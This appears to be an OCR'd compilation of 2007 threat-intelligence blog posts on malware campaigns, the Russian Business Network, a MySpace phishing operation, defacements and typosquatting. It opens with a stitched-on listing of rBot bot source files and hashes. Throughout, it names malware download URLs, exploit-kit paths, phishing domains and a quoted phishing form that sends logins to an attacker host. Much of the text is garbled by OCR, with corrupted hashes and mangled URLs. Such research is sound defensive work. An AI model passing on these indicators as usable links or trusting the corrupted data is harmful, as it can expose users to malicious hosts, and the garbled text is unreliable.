sub7.cpp ab416250dc7c47a499f6dd28b99el1ac0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
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tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbhe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
rBot.pdb 1f3e1e89a42c426a5ad6c8675f73d12c 
rBot.exe.pec2bac 
22c40d78ca88c107e5170488dbcbacba 
win32snd.exe 
c4139041cd580c9754436db554745f65 
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advscan.cpp 
dc7a923ed3e65a670f806ac307dc3eb7 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authors.txt 
5e70b680fcdafdbbd86d5b010dbb8b87 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 


configs.h 
e1e635834664b904a47c7bdfa22ca87c 
crc32.cpp 
3771¢c5b3f6992c43c0e12a57c41la727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 


crypt.cpp 
f8d56522e7015cff349715794104c50f 
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crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
f233cac08783d090c8cd2d7526d60781 
download.cpp 

664845639 1laff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
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de46029aee975069a6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
4cb2e277eaee6a70467b72db23e16670 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 
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€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
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58.65.238.36/index2 _files/index.htm, and so is the malware itself - 58.65.238.36/iPIX- 
install.exe. 


Malware campaigners are not just setting objectives and achieving them, they’re also 
evaluating the results and drawing conclusions on how to improve the next campaign. Back 
in January, 2006, | emphasized on [4]the emerging trend of localization in respect to malware, 
take for instance the release of a trojan in an open source form so that [5]hacking groups 
from different countries could localize it by translating to their native language and making 
it even more easy to use, as well as [6]the localization of MPack and IcePack malware kits 
to Chinese. In this campaign, a localized URL was also available targeting Dutch speaking 
visitors 58.65.238.36/polinanl, so you you have a German and Dutch languages included, and 
as we’ve seen the ongoing consolidation of malware authors and spammers serves well to 
both sides, spammers will on one hand segment all the German and Dutch emails, and the 
malware authors will mass mail using localized message templates. Great social engineering 
abusing a common stereotype that for instance German users were definitely flooded with 
English messages courtesy of Storm Worm targeting U.S citizens, which is like a Chinese user 
who's receiving a phishing email from the Royal Bank of Scotland - it’s obvious both of these 
are easy to detect. Which is what localization is all about, the malware and spam speaks your 
local language. One downsize of this campaign is that Polina doesn’t really look like a lonely 
German student, in fact she’s a model and these are some of her portfolio shots. 


Let’s discuss how are the malware campaigners coming up with these Geocities accounts at 
the first place. Are the people behind the campaign manually registering them, outsourcing 
the registration process to someone else, or [7]directly breaking the [8]CAPTCHA? Could be 
even worse - they may be buying the already registered Geocities accounts from another 
group that’s specializes in registering these, a group which like a previously covered concept 
of [9]Proprietary Malware Tools is earning revenues based on higher profit margins given 
they don’t distribute the product, but provide the service thereby keeping the automatic 
registration process know-how to themselves. Once the authentication details are known, 
the process of anything starting from blackhat SEO, direct spamming, malware hosting, and 
embedding such scripts, even IFRAMEs in a fully automated fashion. 


Meanwhile, what are the chances there’s [10]another scammy ecosystem on the same 
netblock? But of course. vaichoau.com fake watches, pimpmovie.net malware C &C, 
urolicali.com.cn spammers, westernunion.reg-login.com a phishing url. 


ttp://www.windowsecurity.com/articles/Popular-Spammers-Strategies-Tactics.htm 


1. 
2 
3. 

4 

5. 
6. 

Te 

8. 

9. 


ttp://ddanchev.blogspot.com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


10, 
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3.11.20 But of Course I’m Infected With Spyware (2007-11-18 18:30) 


REMOVE ALL 


Remember those old school fake hard drive erasers where a status bar that’s basically doing 
a directory listing is shown, and HDD activity is stimulated so that the end user gets the false 
feeling of witnessing the process? [1]Fake anti spyware and anti virus software, like the ones 
courtesy of the now [2]fast-moving RBN, have been using this tactic for a while, and adding an 
additional layer of social engineering tricks by obtaining the PCs details with simple javascript. 
The folks behind online-scan.com; spyware.online-scan.com; antivirus.online-scan.com own 
a far more deceptive domain name compared to RBN’s ones. In fact, even an anti virus 
vendor could envy them for not picking it up earlier and integrating it in upcoming marketing 
campaign or service to come. SpywareSoftStop’s statements : 
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"At present the Internet is stuffed with viruses of any kind. Every PC is at risk and most probably 
IS infected. Anti-viruses can detect viruses only, but spyware, installed surreptitiously on a PC 
without the user’s informed consent, is modified each day and solely particularized software 
can help to detect and remove it. However, a spyware program is rarely alone on a computer: 
an affected machine can rapidly be infected by many other components. In some infections, 
the spyware is not even evident; moreover, some types of spyware disable software firewalls 
and anti-virus software, and/or reduce browser security settings, thus opening the system 
to further opportunistic infections, much like an immune deficiency disease. Right now your 
system is going to be scanned and spyware, if any, will be detected." 


The name servers preved.spywaresoftstop-support.com and medved.spywaresoftstop- 
support.com serve : spywaresoftstop.com; spywaresoftstop-cash.com; spywaresoftstop- 
support.com. The popup at online-scan.com that’s now returning a 404 error for Idr.exe 
(downloadfilesIdr.com/download/2/Idr.exe) will even appear if you try to close the window while 
your PC is "being scanned". What’s Idr.exe? It’s the default output of a [3] DIY malware courtesy 
of Pinch. 


1. http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 


2. http: //rbnexploit . blogspot. com/2007/11/rbn-fake-tools-rogue-software-bank-of .htm 
3. http: //pandalabs.pandasecurity.com/archive/PINCH_2C00_-THE-TROJAN-CREATOR. aspx 
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3.11.21 The "New Media" Malware Gang (2007-11-18 23:49) 


trafika. info 
repairhddtech.com 
granddslp, net 
preveditd.net 
stepling.net 
softoneveryday.com 


samsntafox.com 


gotizon,net 


besttanya.com 
carsent.com 
heliosab. info 
gipperlox.info 
leader-invest.net 
Fiderfox.info 


potec.net 


78.109. 16.242.in.hosting.ua 


Since [1]Possibility Media’s Malware Fiasco, I’ve been successfully tracking the group behind 
the malware embedded attack at each and [2]every online publication of Possibility Media. 
Successfully tracking mostly because of their lack of interest in putting any kind of effort 
of making them harder to trace back, namely, maintaining a static web presence, but one 
with diversifying set of malware and exploits used. Possibility Media’s main IFRAME used 
was 208.72.168.176/e-Sr1pt2210/index.php, and at 208.72.168.176 we have a great deal of 
parked domains in standby mode such as : 


repairhddtech.com 
granddslIp.net 
preveditd.net 
stepling.net 
softoneveryday.com 
samsntafox.com 
himpax.com 
grimpex.org 
trakror.org 
dpsmob.com 
besotrix.net 
gotizon.net 
besttanya.com 
carsent.com 
heliosab.info 
gipperlox.info 
leader-invest.net 
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fiderfox.info 
potec.net 


However, the latest IPS and domains related to the group are dispersed on different net- 
blocks and are actively serving malware through exploit URLs : 


78.109.16.242/us3/index.php 
x-victory.ru/forum/index.php (85.255.114.170) 
asechka.cn/traff/out.php (78.109.18.154) 
trafika.info/stools/index.php (203.223.159.92) 


What’s so special about this group? It’s the [3]connection with the [4]Russian Business 
Network. As I’ve already pointed out, the malware attack behind Possibility Media’s [5]was 
using IPs rented on behalf of RBN customers from their old netblock, here are two such 
examples of RBN IPs used by this group as well : 


81.95.149.236/us3/index.php 
81.95.148.162/e202/ 


In case you also remember, some of [6]this group’s URLs were also used as communica- 
tion vehicle with a downloader that was hosted on a RBN IP, that very same RBN IP that was 
behind Bank of India’s main IFRAME. Now that’s a mutually beneficial malicious ecosystem for 
both sides. [7]Here are [8]more comments on other [9]ecosystems. 


ttp://ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 


ttp://ddanchev .blogspot.com/2007/10/portfolio-of-malware-embedded-magazines.htm 


ttp://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.htm 


1. 
2. 
3. 
4. hvtp://ddanchev blogspot. con/2007/10/russian-business-netork. tal 

beg //asncusy ioreost,coa/2000/10/ arte 100 malvares woened ou viarie Seana 
6. http: //ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 

7 cep /aancuey Sepoost,coe/001/11/ toasty pettcasaeeree weal 

8. hep://adanchev blogspot. con/2007/11/scanny-ecosysten.htal 

9. : 


ttp://ddanchev.blogspot.com/2007/02/phishing- ecosystem. htm 
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3.11.22 Large Scale MySpace Phishing Attack (2007-11-20 05:42) 
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In need of a "creative phishing campaign of the year"? Try this, perhaps the largest phishing 
attack spoofing MySpace and collecting all the login details at a central location, that’s been 
active for over a month and continues to be. A Chinese phishing group have come up with 
legitimate looking MySpace profiles (profile.myspace.com) in the form of subdomains at their 
original .cn domains, and by doing so achieve its ultimate objective - establish trust through 
typosquatting, remain beneath the security vendors radar by comment spamming the URLs 
inside MySpace, and obtain the login details of everyone who got tricked. 


Key points : 


- all of the participating domains are using identical DNS servers, whereas their DNS records 
are set to change every 3 minutes 


- each and every domain is using a different comment spam message, making it easy to assess 
the potential impact of each of them 


- the URLs are not spammed like typical phishing emails, but comment spammed within MyS- 
pace by using legitimate accouts, presumably once that have already fallen victim into the cam- 
paign, and mostly to remain beneath the radar of security vendors if the URLs were spammed 
in the usual manner 
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- all of the URLs are the subdomains are currently active, and the login details get forwarded 
to a central location 319303.cn/login.php 


This how the fake MySpace login looks like on the fake domains/subdomains : 


(form action = "http://319303.cn/login.php" method = "post" name = "theForm" id = "theForm) 
This is how the real MySpace login looks like : 


(form action = "http://secure.myspace.com/index.cfm?fuseaction=login.process" method = 
"post" id = "LoginForm") 


Sample MySpace phishing URLs from this campaign : 


profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn 


profile.myspace.com.index.fuseaction.id.370913.cn 


profile.myspace.com.fuseaction.id.0ed37i8xdd.125723.cn 
profile.myspace.com.fuseaction.id.Dx78x00iJje5.982728.cn 


profile.myspace.com.fuseaction.user.id.28902334.arutncbt.cn 


profile.myspace.com.fuseaction.id.Ond8di8xfd.125723.cn 


profile.myspace.com.fuseaction.id.0ed37i8xdd.109820.cn 


Ten sample Chinese domains participating in the phishing attack, returning the MySpace 
spoof at the main index and the subdomains : 


378d38.cn 
978bg33.cn 


370913.cn 
107882.cn 


103238.cn 
978nd03.cn 


107882.cn 


pcc2ekxz.cn 


125723.cn 


pckeez.cn 
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Assessing the comment messages used on ten phishing domains for internal comment spam- 
ming at MySpace : 


370913.cn - "haha i cant believe we went to high schoo! with this girl" 


978bg33.cn - "sometimes i cannot believe the pics people put on their myspaces" 


982728.cn - "| cannot believe this freaking whore would put pics like that on her myspace 
page.. how trashy.." 


977y62.cn - "did you see what happened? OMG you gotta see Mike’s profile." 
125723.cn - "did you see what happened? OMG you gotta see Mike’s profile." 


pckeez.cn - "can you believe we went to highschool with this chick?" 


pcc2ekxz.cn - "can’t believe a 18 year old chick would put half-nude pics on myspace. whore 
alert." 


arutncbt.cn - "wow her brother is gonna be so pissed when he sees the pictures she put on her 
myspace" 


125723.cn - "Did you hear what happened Omg you gotta see the profile.. So sad!" 


109820.cn- "sometimes i just cannot believe the pics that people put on their myspaces LMAO!" 


The campaign is surprisingly well thought of. If they were spamming the phishing URLs, 
security vendors would have picked it up immediately and its lifetime would have been much 
shorter compared to its current one. The phishers aren’t sending emails asking people to login 
to MySpace via profile. myspace.com.random _digits.cn for instance, instead they’re spamming 
inside MySpace by posting comments prompting users to click further using the phrase "haha 
i cant believe we went to high school with this girl". It gets even more interesting, compared 
to the common logic of them having to register fake accounts and posting the comments by 
using them, in this case, the three sample comments posted on Nov 2 2007 11:22 AM; Nov 4 
2007 1:02 PM; Nov 5 2007 8:47 AM; Nov 5 2007 9:33 PM, are all posted by legitime users, well 
from legitimate users’ accounts in this case. How huge is this? Over 378,000 results for the 
Campaign under this phrase keeping in mind that people embed their MySpace profiles at their 
domains, and 128,000 instances of a sample phishing domain (370913.cn) at MySpace.com 
itself. This is for one of the phishing domains only. 


Now if that’s not enough to disturb you, each and every of the .cn domains are resolving to 
what looks like U.S based hosts only that will change every 3 minutes. Not necessarily [l]as 
dynamic as [2]previously discussed [3]fast-flux networks, but these are worth keeping an eye 
on: 


[4]107882.cn 


[5]370913.cn 
[6]978bg33.cn 
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Here are some central DNS servers that all the .cn domains use : 
ns4.6309a46.com 


ns1.52352a0c60a9c29.com 
ns3.926817a885d86el.com 


ns2.terimadisirida.net 


I’ll leave the data mining based on these patterns to you, what’s important is that the URLs 
are still serving spoofed MySpace front pages, with the only downsize that they cannot 
sucessfully load MySpace’s videos, and don’t provide any SSL authentication, which | doubt 
have prevented lots of people from falling victims into it. 


Does all the data lead us to conclude that this could be the most "creative phishing 
campaign of the year"? Let’s have it offline first. 


1, ft ip://Adanchev. blogepot .con/2007/08/storn- vorne~fast~flux-networks _htal 
2. hevp://adanchev blogspot. con/2007/11/nanaged-fast~f1ur~provider hea] 

4, hetp://ing218. imageshack. us/ing242/6873/107882enbu9. png 
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At first it appeared that it was just the [l]official site of Goa’s DolIP, that’s been defaced 
by [2]Turkish defacers, but looking further the campaign gets much bigger than originally 
anticipated : 


"The official website of the Goa government’s Department of Information and Publicity 
(DoIP) - goainformation.org - was hacked by a group of Turkish militants on Saturday. The 
hacker has not only defaced the website, replacing all information with the group’s propa- 
ganda material in Turkish language, but also posted some gory pictures of slain terrorists. 
The DoIP has now lodged a complaint with the Panjim Police and the Panjim crime branch is 
investigating the matter." 


The campaign is aiming to [3]send a PSYOPS signal to the rest of the world regarding 
the recent tensions between [4]Turkey’s military operations in northern Iraq against PKK, an 
action the U.S doesn’t seem to enjoy at all. Some sample defaced sites are savymedia.com; 
itrit.com; sledderforever.com; pssoc.org; youthblood.org; prisonministry.com. The defacers 
are sending the following message : 


"The United States of America who is feeding on and strengthening behind closed doors 
the universal terrorists, is the greatest terrorist country. pkk/kadek/hpg/kkk is the world’s 
most bloody and brutal terrorism group. They killed approximately 35.000 innocent people 
without any cruel till now. All the nations and states must know which are supporting these 
bloody and brutal terrorism groups, supporting terrorism will brings suffer and deathness. We 
are always be a Side of peace. but we have always some words to say these terrorists "which" 
wants to seperate us and kill innocent people" 


Moreover, [5]Turkish hacktivists from another group have also been active recently by 
defacing the Assyrian Academic Society, Assyrian actress and author Rosie Malek-Yonan’s 
site, and International Campaign to Support the Christians of Iraq petition’s site. Three other 
Turkish hacktivists are also currently defacing under the handles of NusreT, [6JMUSTAFAGAZI, 
and [7]Storm, using the same defacement templates. The first group is reachable at a closed 
forum turkmilliyetcileri.org, and the second at turkittifak.org. Apparently, these groups are 
all under the umbrella of the [8]Turkish Republican Hackers group. 


1. bttp://www.mumbaimirror.com/net/mmpaper.aspx?page=article&sectid=2&content id=2007111820071118025237484ab 


2. 

3. i - 
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3.11.24 A Botnet of Infected Terrorists? (2007-11-21 22:33) 


Redefining malware to minimize the negative public outbreak by renaming it to Remote 
Forensic Software, now that’s a evil marketing department’s positioning strategy in action. 
I’ve already discussed how inpractical the [1]utopian central planning of a security industry 
is, and while you’re limiting the access to the tools who may help someone unethically pen 
testing an internal asset, you’re also limiting the possibility for the discovery of such vulnerable 
asset - basically a false feeling of security, you don’t touch it, it doesn’t move, until of course 
someone else outside your controlled environment comes across it, the way they will sooner 
or later since it’s an open network, one you benefit from, but cannot fully control. 


[2]Australian law enforcement have been using spyware for a while, and Austria follow- 
ing [3]Germany’s interest into the concept is getting [4]involved too: 


"Germany is hiring software specialists to design "white-hat" viruses that could infiltrate ter- 
rorists’ computers and help police detect upcoming attacks, an Interior Ministry sookeswoman 
in Berlin confirmed Saturday. The government is still drafting legislation to permit snooping 
via the internet under judicial control, but has decided there is no time to lose in developing 
the "remote forensic software." The ministry said the BKA federal police had been instructed 
to resume the development and hire two specialists." 


[5]Are cyber criminals or bureaucrats the industry’s top performer? In November, 2008, 
we'll be discussing how come so much money were spend to develop the malware, given the 
lack of any ROI! out of this idea during the entire period, whereas DIY malware tools are not 
just a commodity, but also freely available for a law enforcement to use. Moreover, emailing 
malware is so old-fashioned and noise generating, that even the average Internet users knows 
"not to click on those email attachments sent from unknown source". A far more pragmatic 
approach would be to embedd the malware on sites suspected of evangelizing terrorism, or 
radicalizing their audiences, by doing so you'll end up with a larger infected sample, and 
eventually someone, let’s say 1 out of 10,000 infected will turn out to be a terrorist, by 
whatever definition you’re referring to in the case. Even more pragmatic, by [6]requesting a 
botnet on demand, and requiring the botnet master to tailor your purchase by providing you 
with infected hosts in Germany whose browser language, and default fonts used are Arabic, 
you will not just save money, but will increase the probability of coming across a stereotyped 
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terrorist, by outsourcing the infecting stage to those who excell at it. 


Excluding the sarcasm, it’s your money that go for funding of such initiatives who basi- 
cally "shoot into the dark" to see if they can hit someone. Even if they manage to infect 
someone, more staff will be required to monitor the collected data, which means more money 
will go into this, ending up with an entire department monitoring wishful thinking and thought 
crime. [7]Geheime Staatspolizei anyone? 


If you really want access to real-time early warning threat intell for possible threats, monitor 
the [8]public cyber jihadist communities don’t come up with new ones to use them as [9]hon- 
eypots for cyber jihadists, identify local residents, [10]evaluate their state of radicalization 
and attitudes towards standard terrorist ideas, prioritize, and take action if necessary. 


Cartoon courtesy of [11]Mahjjob.com 


1 fitep:/adanchev. blogspot .con/ 2007/07 /insecure-bureaucracy-in-germany bial 

2, http: //nevs.con.con/hustral ian¢policetget+go-aheadvontspyware/2100~794@, 6404671. kta 

3, http://amy. enh. com. au/news/Hor14/Germany-to-bag-terrorists-computers/2007/11/18/19892167601 tall 
4, http: //ddanchev blogspot .con/2007/08/intecting-terrorist- suepects-vith. heal] 

5, http: //adanchev. blogspot .con/2006/08/are~cyber~criminals-or-bureaucrats ta 

6. rp: //adanchev blogspot .con/200T/10 /ootnet-on-doxand-service ta 
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3.11.25 The State of Typosquatting - 2007 (2007-11-23 16:10) 
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The recently released "[1]What’s In A Name: The State of Typo-Squatting 2007" is a very 
in-depth and well segmented study into the topic, you should consider going through : 


[2]Introduction 

[3]Typo- and Cyber-squatting on the rise 

[4]Key Findings 

[5]Methodology 

[6]Rankings by Category 

[7]Sample site: McAfee.com 

[8]The Economics of Typo-Squatting: Why it Works 
[9]What is driving the increase in typo-squatting 
[10]The decline in adult content on typo-squatters 
[11]Discussion of our methodology 

[12]Defining Typo-Squatting 

[13]Other Methods for Combating Typo-Squatting 
[14]Conclusions 

[15]Complete Results 


Is it just me using bookmarks and only risking to fall victim into a pharming attack, compared 
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to manually typing and mistyping an URL? My point is that coming across several articles 
emphasizing how important typing the right URLs is, | think they’ve missed an important point 
which is that typosquatting by itself isn’t that big of a security threat, but in a combination 
of tactics it becomes such. There’s no chance you will ever mistype an URL such as paypal- 
comlwebscrc-login-run.com, a [16]typosquatted domain like the ones | covered in September, 
since these ones come in as phishing emails hosting a Rock Phish kit, namely they turn into 
threats when combined with other tactics. Blackhat SEO is another such tactic. The type of 
buy-cheap-iphones.com always aim to trick search engines into positioning them among the 
first 20 results, and they often succeed until a search engine figures out it’s a blackhat SEO 
spam and removes it from the index. 


Here’s an example of such combination of tactics, [17]use-iphone.com for instance was 
spammed according McAfee, the folks behind the study. What’s was use-iphone.com all 
about? Icepack kit in action - use-iphone.com/ice-pack/index.php. 


H 


mcafee.com/root/identitytheft .asp?id=safe_typokcid=38296 
mcafee.com/root/identitytheft.asp?id=safe_typokcid=38296#introductio 
mcafee.com/root/identitytheft.asp?id=safe_typokcid=38296#TypoCyberSquatting 
mcafee.com/root/identitytheft .asp?id=safe_typokcid=38296#KeyFindings 
mcafee.com/root/identitytheft .asp?id=safe_typokcid=38296#Methodolog 
mcafee.com/root/identitytheft .asp?id=safe_typokcid=38296#Rankings 
mcafee.com/root/identitytheft .asp?id=safe_typokcid=38296#SampleSite 
mcafee.com/root/identitytheft.asp?id=safe_typo&cid=38296#Economics 
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.mcafee.com/root/identitytheft.asp?id=safe_typo-ful 


16. http: //ddanchev.blogspot .com/2007/09/paypal-and- ebay-phishing- domains. htm 
17. http://www.siteadvisor.com/sites/use-iphone.com/summary/ 
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3.11.26 Exposing the Russian Business Network (2007-11-26 11:52) 
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It was about time someone comes up with an in-depth study summarizing all of the Russian 
Business Network’s activities, as for me personally, 2007 is the year when bloggers demon- 
strated what wisdom of the crowds really means, by putting each and every piece of the 
puzzle to come up with the complete picture, one the whole world benefits from. A highly 
recommened account into the RBN’s activities courtesy of David Bizeul’s "[1]Russian Business 
Network study" : 


"It’s interesting to observe that many recent cyber crime troubles are relating to Russia. 
This observation is obviously a simple shortening. Indeed nothing seems to link to Russia 
at first sight, it’s a nasty country for sending spam but many are worst, Russia is only the 
8th top spam country. We need to dig deeper to identify that cyber crime is originating 
mostly from Russian dark zones. In a digital world, those dark zones exist where the Internet 
becomes invisible and it’s used for collecting phishing sites credentials, for distributing drive 
by download exploits, for collecting malware stolen data, etc. It’s a considerable black market 
as it has been revealed in this paper. A lot of information can be available over the web on 
Russian malicious activities and precisely on the way RBN (Russian Business Network) plays a 
major role in these cases." 


What contributed to such a well coordinated exposure of the RBN during the last two 
quarters at the bottom line? It’s not just security researchers exchanging info behind the 
curtains, but mostly due to RBN’s customers confidence in RBN’s ability to remain online. 
And while remaining online has never been a problem for the RBN, until recently when DIY IP 
blocking rulesets were available for the world to use, they undermined their abilities to remain 
undetected. In fact, | was about start a contest asking anyone who can come up with a IP with 
a clean reputation within the RBN’s main netblock right before it dissapeared, and would have 
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been suprised if someone managed to find one. 


The RBN doesn’t just makes mistakes when its customers embedd malware hosting and 
live exploit URLs on each and every malware and high-profile attack during the year, it simply 
doesn’t care in covering its tracks and so doesn’t their customers as well. RBN’s second biggest 
mistake for receiving so much attention is their laziness which comes in the form of over 
100 pieces of malware hosted on a single IP, without actually bothering to take care of their 
directory listing permissions, allowing my neatly crafred OSINT gathering techniques to come 
up with yet proof of acommon belief into their practice of laziness. Moreover, the KISS strategy 
that | often relate to the successful malicious economies of scale that malware authors achieve 
due to DIY malware kits using outdated exploits compared to bothering to purchase zero day 
ones, didn’t work for the RBN. Remember that each and every of the several Storm Worm 
related IPs that | covered once were returning fake suspended account notices in a typical KISS 
strategy, while the live exploit URLs and the actual binaries were still active within the domains. 


This isn’t exactly what you would expect from what’s turning into a case study on con- 
versational marketing, or perhaps how conversational marketing provokes the wisdom of 
crowds effect to materialize, so that the entire community benefits from each and everyone’s 
contribution - in this case exposing the RBN. 


How would the RBN change its practices in the upcoming future given all the publicity it 
received as of recently? They will simply stop benefing from the easy of management of their 
old centralized infrastructure, and will segment the network into smaller pieces, but while still 
providing services to their old customers, they’re easy to traceback, and to sum up this post 
in one sentence - the Russian Business Network is alive, and is providing the same services to 
the same customers, including malware and live exploits hosting URLs under several different 
netblocks. 


It’s also great to note that David’s been keeping track of my research into the RBN’s ac- 
tivities. [2]Go through the study and find out more about the RBN practices. 


Related posts: 

[3]Go to Sleep, Go to Sleep my Little RBN 

[4]Detecting and Blocking the Russian Business Network 
[5]RBN’s Fake Security Software 

[6]Over 100 Malwares Hosted on a Single RBN IP 

[7]The Russian Business Network 


1. http: //bizeul.org/files/RBN_study. pdf 
2. http: //bizeul .org/files/RBN_study. pdf 
3: 


ttp://ddanchev. blogspot .com/2007/11/go-to-sleep-go-to-sleep-my-little-rbn. html 


> 


http: //ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


5. http: //ddanchev. blogspot .com/2007/10/rbns-fake-security-software.htm 
6. http: //ddanchev. blogspot .com/2007/10/over-100-malwares-hosted-on-single-rbn. htm 
7. http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 
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3.11.27 But Malware is Prone to be Profitable (2007-11-26 19:33) 
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. How the Customer explained it 

. How the Project Leader understood it 

. How the Analyst designed it. 

. How the Programmer wrote it. 

. How the Business Consultant described it 
. How the project was documented 

. What operations installed 

. How the customer was billed. 
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. How it was supported. 
. WHAT THE CUSTOMER NEEDED. 
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Read this [1]a couple of times, than read it several more times, and repeat. It’s usually 
"powerful stuff" that prompts such confusing descriptions of what sound like defense in-depth 
at one point, and a combination of intergalactic security statements in respect to the "massive 
amounts of computing power required" to solve the "security problem" at another. Stop 
predicting weather and assessing the impact of global warming, and [2]command the super- 
computers to figure our the scientific mysteries behind common insecurities : 


"Even if we can’t produce effective network security, we can at least make it more diffi- 
cult and therefore expensive to attack a network by adopting some of the hacker’s own 
techniques. He favors randomizing the use of a number of techniques for filtering content, 
so that individual malware vectors will sporadically stop working. By changing the challenge 
involved in compromising systems, the whole malware economy is changed. Stolfo also took 
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a positively Darwinian view of how much change was needed, suggesting that security only 
had to be good enough to make someone else’s system look like a more economical target. 
Overall, the talks were pretty depressing, given that the operating systems and software 
we rely on will probably never be truly secure. The process of blocking malware that takes 
advantage of this insecurity appears to be entering the realm where true security has become 
one of those problems that requires massive amounts of computing power and an inordinate 
amount of time." 


The operating systems and the software we use can be truly secure, [3]but will be use- 
less compared to the currently insecure, but useful ones we’re using. Now here’s a [4]great 
and straight to the point article, that’s segmenting the possible uses of a host that’s already 
been compromised, a great example of how innovations in terms of improved Internet connec- 
tivity, increased CPU power, and flexibility of online payments both steamline progress, and 
contribute to the growth of the underground. 


Beat malware by doing what malware authors do? Sounds great. Malware authors out- 
source, do it too. Malware authors embraced the on demand SCM concept, embrace it too. 
